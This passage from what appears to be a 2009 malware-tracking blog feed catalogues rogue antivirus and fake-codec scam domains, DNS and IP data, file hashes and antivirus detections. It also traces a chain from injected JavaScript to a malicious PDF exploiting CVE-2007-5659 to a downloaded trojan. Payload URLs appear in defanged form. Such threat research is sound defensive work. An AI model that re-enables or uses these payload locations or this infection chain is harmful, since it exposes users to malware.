class="scam_website">examineillnesslive.cn</span><br /><span class="scam_website">freedefenseforyou.cn</span><br /><span class="scam_website">mycheckdiseasepro.cn</span><br /><span class="scam_website">mycheckdiseasestore.cn</span><br /><span class="scam_website">mydefense4u.cn</span><br /><span class="scam_website">mydefense4you.cn</span><br /><span class="scam_website">myguardforyou.cn</span><br /><span class="scam_website">newguard4u.cn</span><br /><span class="scam_website">newguard4you.cn</span><br /><span class="scam_website">refugepro.cn</span><br /><span class="scam_website">yourguard4you.cn</span><br /><span class="scam_website">yourguardforyou.cn</span><br /><span class="scam_website">yourguardonline.cn</span><br /><span class="scam_website">yourguardpro.cn </span><br /><br /><a href="http://anubis.iseclab.org/?action=result&task_id=190fc55b62d92d7e4c5f530e56ace2255&format=html">Anubis</a> - <a href="http://www.virustotal.com/analisis/3ad454086dcaf5b39567c1eda21943b5" target="_blank">VirusTotal</a> <br /><br /> Created 30-mar-2009 <br /><br /> Registered with "广东时代互联科技有限公司" translated into english the result beeing:<br /><br />"Time Internet Technology Co., Ltd. Guangdong" also cited as registrar for hosting SCAM websites here<br /><br /><a href="http://www.bobbear.co.uk/DDK-Group-Inc.html" target="_blank">DDK-Group-Inc.</a><br /><a href="http://www.bobbear.co.uk/EFS-Capital-Group-Inc.html" target="_blank">EFS-Capital-Group-Inc</a><br /><a href="http://www.bobbear.co.uk/tdk-group-inc.html" target="_blank">tdk-group-inc</a> <br /><a href="http://www.bobbear.co.uk/e-innovative-inc.html" target="_blank">e-innovative-inc </a><br /><br />DNS: <br /><br /><span class="scam_website">ns1.pubilcnameserver7.com</span> [94.247.2.215]<br /><span class="scam_website">ns2.pubilcnameserver7.com</span> [94.247.2.216]<br /><br /> Using the same DNS we have:<br /> <br /> <span class="scam_website">easyaddedantivirus.com</span> [94.247.2.215]<br /> <span class="scam_website">yourcountedantivirus.com</span> [94.247.2.215]<br /><br />Created 30-mar-2009 <br /><br />Registrar used: BIZCN.COM, INC.<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2q4eyiYvI/AAAAAAAAAEs/YPeco5Up8Fg/s1600-h/antivirus-plus-new.com.jpg"><img style="cursor:pointer; cursor:hand;width: 205px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2q4eyiYvI/AAAAAAAAAEs/YPeco5Up8Fg/s320/antivirus-plus-new.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_" /></a> <br /><br />Application screenshot (Alias: FakePlus)<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sdgw5blSCiI/AAAAAAAAAWo/vEEA3ebKws0/s1600-h/AntivirusPlusSetup2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sdgw5blSCiI/AAAAAAAAAWo/vEEA3ebKws0/s320/AntivirusPlusSetup2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321056722953046562" /></a><br /><br /><hr /><span class="scam_website">topsoftscanner.com</span> [209.44.126.14]<br /><br />Created 25-mar-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD<br /><br /><span class="scam_website">thegreatsecurity.com</span> [209.44.126.14]<br /><br />hxxp://golkis.dnip.net/online-j49/yornt.html<br /><a href="http://wepawet.iseclab.org/view.php?hash=877ac4d842b4d77d426ff3b8eb93694d&t=1238846260&type=js" target="_blank">Javascrit Analysis</a> by Wepawet<br /><br />Seen on Alexa<br /> "The Google cache has been updated and the link has been removed."<br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdfiwVBzd8I/AAAAAAAAAWQ/yt1UTY37ncY/s1600-h/thegreatsecurity.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 44px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdfiwVBzd8I/AAAAAAAAAWQ/yt1UTY37ncY/s320/thegreatsecurity.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320970804667840450" /></a><br /><br /> Created 03-apr-2009 <br /><br /> No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD <br /><br /><span class="scam_website">checkonlinesecurity.com</span> [209.44.126.14]<br /><br />Created 05-apr-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD <br /><br /><span class="scam_website">todaybestscan.com</span> [209.44.126.14]<br /><br />Created 05-apr-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD <br /><br /> Using these two DNS: <br /><br /><u>ns1.fuckmoneycash.com</u> [209.44.126.15]<br /><u>ns2.fuckmoneycash.com</u> [209.44.126.16] <br /><br /> Title: <i>My computer Online Scan</i><br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdeEYouqP7I/AAAAAAAAAWI/0YEWjlXDpX8/s1600-h/thegreatsecurity.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdeEYouqP7I/AAAAAAAAAWI/0YEWjlXDpX8/s320/thegreatsecurity.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320867043546382258" /></a><br /><br /><br /><br /><br /><br /></td></tr><tr> <td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Template used:</b></td></tr><tr><td width="27" height="40"> </td><td width="491"><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdgT6-oFJnI/AAAAAAAAAWg/R4Nu7dfQ1dQ/s1600-h/easyincomeprotection.cn-SCAM-AntivirusPlus-2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 280px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdgT6-oFJnI/AAAAAAAAAWg/R4Nu7dfQ1dQ/s320/easyincomeprotection.cn-SCAM-AntivirusPlus-2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321024863702689394" /></a> <a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdgT6_UYKXI/AAAAAAAAAWY/FN9xh1SL9Ds/s1600-h/easyincomeprotection.cn-SCAM-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 270px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdgT6_UYKXI/AAAAAAAAAWY/FN9xh1SL9Ds/s320/easyincomeprotection.cn-SCAM-AntivirusPlus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321024863888484722" /></a> <br /><a rel="dofollow" target="_blank" href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sb2ujdPf9KI/AAAAAAAAAFM/WEU9pDOOxVk/s1600-h/onlinewebscan1-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sb2ujdPf9KI/AAAAAAAAAFM/WEU9pDOOxVk/s320/onlinewebscan1-AntivirusPlus.jpg" border="0" alt="Template AntivirusPlus from onlinescanweb.com" id="BLOGGER_PHOTO_ID_5313595059535344802" /></a><a rel="dofollow" target="_blank" href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sb2vIvT4dvI/AAAAAAAAAFc/R_BnYZJX0TQ/s1600-h/onlinewebscan-AntivirusPlus.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sb2vIvT4dvI/AAAAAAAAAFc/R_BnYZJX0TQ/s320/onlinewebscan-AntivirusPlus.jpg" border="0" alt="Template AntivirusPlus from onlinescanweb.com" id="BLOGGER_PHOTO_ID_5313595700040726258" /></a><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2xgxaKqiI/AAAAAAAAAFs/UZcugywLCvU/s1600-h/onlinewebscan1-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2xgxaKqiI/AAAAAAAAAFs/UZcugywLCvU/s320/onlinewebscan1-AntivirusPlus.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 1"id="BLOGGER_PHOTO_ID_5313598311944071714" /></a> <a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2xgyPCNzI/AAAAAAAAAFk/6ekd03nleV4/s1600-h/onlinewebscan-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2xgyPCNzI/AAAAAAAAAFk/6ekd03nleV4/s320/onlinewebscan-AntivirusPlus.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 1 bis"id="BLOGGER_PHOTO_ID_5313598312165816114" /></a><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2yPwkA8vI/AAAAAAAAAF0/O7dUhOGAM1Y/s1600-h/onlinescanweb.com-intro-RapidAntivirus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 282px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2yPwkA8vI/AAAAAAAAAF0/O7dUhOGAM1Y/s320/onlinescanweb.com-intro-RapidAntivirus.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 1"id="BLOGGER_PHOTO_ID_5313599119170794226" /></a><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2yPwfmE9I/AAAAAAAAAF8/96TmSKBy7a8/s1600-h/onlinescanweb.com-RapidAntivirus.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 243px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb2yPwfmE9I/AAAAAAAAAF8/96TmSKBy7a8/s320/onlinescanweb.com-RapidAntivirus.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 1 bis"id="BLOGGER_PHOTO_ID_5313599119152255954" /></a><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2zPGBLDvI/AAAAAAAAAGE/7_7cL9QinWs/s1600-h/onlinescanweb.comRapidAntivirusTemplate.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 233px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb2zPGBLDvI/AAAAAAAAAGE/7_7cL9QinWs/s320/onlinescanweb.comRapidAntivirusTemplate.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 2"id="BLOGGER_PHOTO_ID_5313600207261994738" /></a><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb20Jo9vdWI/AAAAAAAAAGM/MgDWKD6N3s8/s1600-h/onlinescanweb.com-RapidAntivirusTemplate3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 275px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb20Jo9vdWI/AAAAAAAAAGM/MgDWKD6N3s8/s320/onlinescanweb.com-RapidAntivirusTemplate3.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 3"id="BLOGGER_PHOTO_ID_5313601213075256674" /></a><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb20KDtVLwI/AAAAAAAAAGU/PMhfeVZRz88/s1600-h/onlinescanweb.com-RapidAntivirusTemplate3bis.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sb20KDtVLwI/AAAAAAAAAGU/PMhfeVZRz88/s320/onlinescanweb.com-RapidAntivirusTemplate3bis.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 3 bis"id="BLOGGER_PHOTO_ID_5313601220254183170" /></a><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb21D3rwhEI/AAAAAAAAAGc/Z_AOubx4C18/s1600-h/onlinescanweb.com-AntivirusPlus_Template2.jpg"><img style="cursor:pointer; cursor:hand;width: 314px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sb21D3rwhEI/AAAAAAAAAGc/Z_AOubx4C18/s320/onlinescanweb.com-AntivirusPlus_Template2.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template"id="BLOGGER_PHOTO_ID_5313602213458773058" /></a><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sb21Dw9Z4GI/AAAAAAAAAGk/H6oFgE5kwbQ/s1600-h/onlinescanweb.com-AntivirusPlus_Template2bis.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 255px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sb21Dw9Z4GI/AAAAAAAAAGk/H6oFgE5kwbQ/s320/onlinescanweb.com-AntivirusPlus_Template2bis.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 2"id="BLOGGER_PHOTO_ID_5313602211653738594" /></a><br /><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-5024048828385217309?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-72513060435326274242009-04-04T22:57:00.000-07:002009-04-04T23:03:29.801-07:00tubeloyaln.com Fake Codec and RogueAV Revisited<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1224" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="758"><p><span style="font-size:14px; font-weight:bold">tubeloyaln.com Fake Codec and Rogue Antivirus revisited</span><br /><br /><br /> The previous page which include 14 domain (10 active) is <a href="http://malware-web-threats.blogspot.com/2009/03/loyaldown-loyaltube-fake-codec-and.html" target="_blank">here</a><br />
</p><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"> <tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td> </tr></table><p><u>Fake codec and fake scanner page</u>:<br /><br />hxxp://tubeloyaln.com/scan/?id=..<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s1600-h/loyaltube09.com-FakeScanner.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 271px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s320/loyaltube09.com-FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318398138422907154" /></a> <br /><br />hxxp://tubeloyaln.com/tube/?id=197&title=adult+movie<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sdg1wVc98pI/AAAAAAAAAWw/qSckwx_tRwE/s1600-h/tubeloyaln.com-fake-codec.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 290px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sdg1wVc98pI/AAAAAAAAAWw/qSckwx_tRwE/s320/tubeloyaln.com-fake-codec.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321062064246878866" /></a> <br /><br /><span class="scam_website">win-pc-defender.com</span><br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdg6kFLUtAI/AAAAAAAAAW4/KSQ4pXT_3M0/s1600-h/win-pc-defender.com.jpg"><img style="cursor:pointer; cursor:hand;width: 273px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdg6kFLUtAI/AAAAAAAAAW4/KSQ4pXT_3M0/s320/win-pc-defender.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321067351277614082" /></a> <br /><br />hxxp://winpcdown09.com/file.exe<br /><br /><a href="http://www.virustotal.com/analisis/27da52a50d8e8cf3213ef96a970cd4bd" target="_blank"> VirusTotal</a>: 14/40<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1412edcea7cac58b4593ac1e8c2fd0757" target="_blank">Anubis</a><br /><br />File size: 71680 bytes<br />MD5...: ac10a8c9d0e7508beafa6f61c1af44bc<br /><br />Alias: <span style="color:#FF0000">Win32/Insebro.A</span> - <span style="color:#FF0000">Adware.WinPCDefender</span><br /><br />hxxp://winpcdown09.com/file.exe<br /><br /><a href="http://www.virustotal.com/analisis/cec611a2cd7a184f6dba817eb89d8e01" target="_blank">VirusTotal</a>: 10/39<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1412edcea7cac58b4593ac1e8c2fd0757" target="_blank">Anubis</a><br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=6C641AEF0030F4099A9C0F52D23B6300ECE58BEC" target="_blank">Prevx</a><br /><br />File size: 1022464 bytes<br />MD5...: 34e1cd77554c06f9d24a6857f702b4fd<br /><br />Alias: <span style="color:#FF0000">FakeAlert.IM</span> -<span style="color:#FF0000"> Win32/FakeRean</span> - <span style="color:#FF0000">WinPCDefender</span><br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=e66fb67721bcb6a6b47879e451ce905b" target="_blank">ThreatExpert</a> (other file)<br />Fraudulent payment system: hxxp://billingpayment.net/pp/?id= <br /><br /><span class="scam_website">winpcdown09.com<br />winpcdown99.com</span><br /><br /><a href="http://www.virustotal.com/analisis/c599f082cd2330a526afb9aaf2e0d15f" target="_blank">VirusTotal</a>: 21/40<br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=C5F95F4000E8ED498008012DDDE82A008FF2688D" target="_blank">Prevx</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=17eb2259b3146e8747922d55cd0d51d8a" target="_blank">Anubis </a><br /><br />File size: 98304 bytes<br />MD5...: d15e5bb28d5e4c31651efb32e000397f<br /><br />Alias: <span style="color:#FF0000">Trojan:Win32/Alureon</span> - <span style="color:#FF0000">Win32.Tdss</span> - <span style="color:#FF0000">DNSChanger.r</span><br /><br />Associated website: <br /><br />trafficstatic.com [92.48.91.144]<br />statsanalist.cn [72.233.114.126]<br />livefind1blogging.com [72.233.115.169]<br /><br /></p><p>The new list is as follow (including sub-domains):<br /><br /><span class="scam_website">iloveyourbrain.com<br />loyal-tube.com<br />loyaldown99.com<br />loyaltube.com<br />loyaltube09.com<br />loyaltube10.com<br />rakompoporyadkunazaryadku.com<br />ruler-domains.com<br />setupdatdownload.com<br />tube-loyal.com<br />tubeloyal.com<br />tubeloyaln.com<br />billingpayment.netcodecs.tubeloyaln.com <br />lamer.tubeloyaln.com <br />videosz.tubeloyaln.com<br />wedare.tubeloyaln.com<br />velzevuladmin.com <br />win-pc-defender.com<br />winpcdown09.com<br />winpcdown99.com<br />xp-police-09.com<br />xp-police-2009.com<br />xp-police-antivirus.com<br />xp-police-av.com<br />xp-police-engine.com<br />xp-police.com<br />gofuckbiz.xp-police.com <br />lamer.xp-police.com <br />suckmydick.xp-police.com<br />rulerteam.xp-police.com<br />sigurd.xp-police.com</span><br /><br />DNS:<br /><br /><span class="scam_website">ns1.loyaltube10.com<br />ns1.tube-loyal.com<br />ns1.tubeloyal.com<br />ns1.winpcdown09.com<br />ns1.winpcdown99.com<br />ns1.xp-police.com<br />ns2.loyaltube10.com<br />ns2.tube-loyal.com<br />ns2.tubeloyal.com<br />ns2.winpcdown09.com<br />ns2.winpcdown99.com<br />ns2.xp-police.com<br />ns3.xp-police.com<br />ns4.xp-police.com<br />ns5.xp-police.com</span><br /><br />IP: 213.163.65.10<br />Reverse: mail.l1ght.net<br />Route: 213.163.64.0/19<br />AS:AS20495 - WEDARE We Dare BV Autonomous System<br /><br /><br /></p></td></tr> <tr> <td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td> </tr> <tr> <td width="25" height="208" valign="top"><br /></td> <td width="547"><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://tubeloyaln.com/scan/?id=..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://tubeloyaln.com/tube/?id=197&title=adult+movie</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://tubeloyaln.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://wincodecupdate.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107010 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">e66fb67721bcb6a6b47879e451ce905b</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=e66fb67721bcb6a6b47879e451ce905b" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/639b3f0ab92bf9fcbea9c6dd6d9eb43a" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=1dae68d4e19b12db48995ce91fe940de0" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha2">04.05.2009 06:39:41 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/40 (15%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">FakeAlert.IR</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /></td> </tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Network graph</b></td></tr><tr><td height="208" valign="top"><br /></td><td><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdhDq37L6sI/AAAAAAAAAXA/2l7b8eHyVyQ/s1600-h/tubeloyaln.com-fake-codec-213.163.65.10.jpg"><img style="cursor:pointer; cursor:hand;width: 82px; height: 320px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdhDq37L6sI/AAAAAAAAAXA/2l7b8eHyVyQ/s320/tubeloyaln.com-fake-codec-213.163.65.10.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321077363584002754" /></a><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-7251306043532627424?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-64446202410462962272009-04-03T11:28:00.000-07:002009-04-19T17:00:56.872-07:00Black Hat SEO and Rogue Antivirus p.5<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO planting trojans</span> <br /><br /> Full of hacks<br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><br /><br />Follow this page for desinfection: <a href="http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html" target="_blank">Malware Manipulating Google SERPs</a> (from blog.scansafe.com)<p> After promoting some spyware and other rogue security software, now this is another list of compromised websites all with obfuscated javascript code inserted which result in:<br /> <br /> hxxp://94.247.2.195/news/?id=100<br /> (<a href="http://jsunpack.jeek.org/dec/go?url=94.247.2.195_news__id=100" target="_blank">Analysis</a>) <br /> <br /> which call <br /> <br /> hxxp://94.247.2.195/news/?id=2<br /> <br /> and download a PDF with a random name QRB.pdf, WXk.pdf ...<br /> <br /> File size: 10417 bytes<br /> MD5: af28f3bc9424a3da7ff8bc84740bce93 <br /> <br /> <a href="http://www.virustotal.com/analisis/6a54baeba7d05c80bc4316ad3b294f86" target="_blank">VirusTotal Analysis</a>: 0/40 (0%)<br /> <br /> when running it load <br /> <br /> hxxp://94.247.2.195/news/?id=10&<br /> <br /> With an Adobe Collab overflow (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659" target="_blank">CVE-2007-5659</a>) <br /> <a href="http://wepawet.iseclab.org/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&type=js" target="_blank">Wepawet Analysis</a><br /> <br /> <a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdZV8fn9CeI/AAAAAAAAAV4/m8RiK0R6vno/s1600-h/PDF1.jpg"><img style="cursor:pointer; cursor:hand;width: 223px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdZV8fn9CeI/AAAAAAAAAV4/m8RiK0R6vno/s320/PDF1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320534507554408930" /></a><br /> <br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdZV8uEKXkI/AAAAAAAAAWA/bkfPpHtdVRs/s1600-h/PDF2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 245px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdZV8uEKXkI/AAAAAAAAAWA/bkfPpHtdVRs/s320/PDF2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320534511430819394" /></a><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdZV8fn9CeI/AAAAAAAAAV4/m8RiK0R6vno/s1600-h/PDF1.jpg"></a><br /> <br />which lead to an executable beeing downloaded and executed.<br />
Also with a random name PO.exe, 8lv.exe ...<br /> <br /> File Size: 15360 Bytes <br /> MD5: 791509d03706cbc8883536b5131341d4<br /> <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html" target="_blank">Anubis Report</a><br /> <br /> <a href="http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a" target="_blank">VirusTotal Analysis</a>: 10/40 (25%)<br /> <br /> a-squared - Trojan-Spy.Agent!IK <br /> Avast - Win32.Daonol-L<br /> eSafe - Suspicious File <br /> GData - Win32:KillAV-KS <br /> Irakus - Trojan-Spy.Agent<br /> Kaspersky - Backdoor.Win32.Agent.afhg<br /> McAfee+Artemis - Generic!Artemis<br /> Prevx1 - High Risk Cloaked Malware<br /> Sophos - Mal/Generic-A<br /> TrendMicro - PAK_Generic.001 <br /><br /> First received on 04.03.2009 18:36:21 (CET) <br /> <br /> Ikarus: Trojan-Spy.Agent (Sig-Id:975847) <br /> <br /> <a href="http://www.threatexpert.com/report.aspx?md5=791509d03706cbc8883536b5131341d4" target="_blank">ThreatExpert Report</a><br /> <a href="http://info.prevx.com/aboutprogramtext.asp?PX5=553B1FA200AA99603C6800E34911BA008604CE7A" target="_blank">Prevx</a><br /> <br /> Source:<br /> <br /> <a 